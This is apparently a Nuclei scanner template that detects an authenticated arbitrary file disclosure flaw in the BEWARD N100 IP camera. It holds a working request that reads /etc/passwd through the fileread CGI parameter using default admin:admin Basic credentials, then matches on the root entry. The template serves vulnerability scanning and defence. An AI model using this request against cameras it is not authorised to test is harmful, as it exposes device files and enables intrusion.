id: beward-ipcamera-disclosure

info:
  name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure
  author: geeknik
  severity: high
  description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API.
  reference: |
    - https://www.exploit-db.com/exploits/46320
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php
  tags: iot,camera,disclosure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/operator/fileread?READ.filePath=/etc/passwd"
    headers:
      Authorization: "Basic YWRtaW46YWRtaW4="

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'root:[x*]:0:0:'

      - type: status
        status:
          - 200
